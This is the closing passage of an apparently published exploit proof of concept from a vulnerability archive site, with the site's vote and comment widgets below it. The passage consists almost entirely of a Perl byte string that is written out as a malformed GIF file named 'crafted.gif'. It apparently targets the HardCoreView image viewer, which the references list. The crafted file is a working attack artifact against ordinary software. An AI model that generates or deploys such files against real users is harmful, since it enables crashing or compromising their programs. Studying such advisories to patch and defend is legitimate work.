"\x27\x3B\x59\xC9\x4A\x96\xAF\x98\x0D\x6C\x61\x05\xE0\x83\x1F\x0C". "\x01\x09\x02\x38\x00\x18\x0C\xF0\x0A\x50\xAC\xD1\x17\x7A\x15\xAC". "\x6A\xFD\x7A\x59\xCB\x0E\x76\xB0\xFF\x24\x0C\x0C\xAC\x40\x05\x2A". "\xFF\x48\x00\x01\x6C\x90\x03\x25\x48\x01\x0D\x6B\xA0\x76\xB5\x94". "\x15\x6C\x70\xFF\x6A\xD9\xE2\x08\x40\x08\x3B\x18\xC1\x07\x12\xA0". "\x01\x26\x9C\x20\x0F\x77\xB8\xC6\x23\x38\x06\x0C\xD7\x16\xD7\xB2". "\x7D\x70\x2D\x66\xB5\x7B\x10\xD4\x70\x36\x07\x31\x10\x81\x13\xC6". "\x50\x07\x3E\xE8\xC1\x0E\xA4\xA8\x06\x2F\x4A\x11\x56\xE2\x5A\xB7". "\x0F\x85\xE0\xEE\x76\x05\xC2\xD6\x82\xB0\xC4\x07\x35\x98\x80\x06". "\x96\xE0\x04\x07\xE4\x08\x0E\x78\x38\xC4\x20\xEC\x90\x8A\x58\x74". "\x82\x17\xED\xED\x2B\x6C\x29\x9B\x59\xF7\x16\x04\x08\x24\xB8\x00". "\x0D\x98\x10\x05\x29\xA4\xC0\x0D\x74\xD8\x07\x1D\xF0\x00\x08\x01". "\xDB\xC1\x00\xA8\xD0\x2B\x71\x19\xBC\xDD\x11\xB3\xD6\x20\x0A\x68". "\x6E\x85\xEB\x91\x86\x16\xBB\x01\x0E\xE5\x3D\x04\x20\x04\x01\x08". "\x3B\xC8\xC2\xBA\xC5\x5D\x70\x6B\x19\x7C\x10\x27\x40\x41\x0A\xF2". "\xE8\x54\x19\xF8\xD1\x62\x18\xFF\x81\xC6\x87\x30\x84\x21\xF6\xE0". "\x07\xD5\x66\x77\xBB\x80\x90\xEF\x89\x0B\x32\x86\x32\xD0\xA1\x0C". "\x69\xE0\x87\x96\xF9\xF1\xE2\x3A\x04\x82\xC6\x1D\x2E\x44\x21\xF6". "\x20\x07\xCB\x16\xE2\xC9\x7C\xC5\x83\x75\xDD\x4B\x5C\x7F\x18\x24". "\x33\xCB\x2D\x1E\xF2\x96\x5F\x1C\x09\x44\x0C\x02\x10\x33\x16\x73". "\x21\xFE\xD0\x64\x42\x14\xE2\x10\xD9\x0D\x00\x21\xFE\xE0\xE6\x42". "\x0B\xC4\x1F\x6E\x0E\x80\x3F\xCA\xE0\x90\x46\x3B\xFA\xD1\x90\x8E". "\x34\x41\x02\x02\x00\x3B"; open(C, ">:raw", "crafted.gif"); print C $crafted; close(C); # http://0xffe4.org

References:

http://sourceforge.net/projects/hardcoreview/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top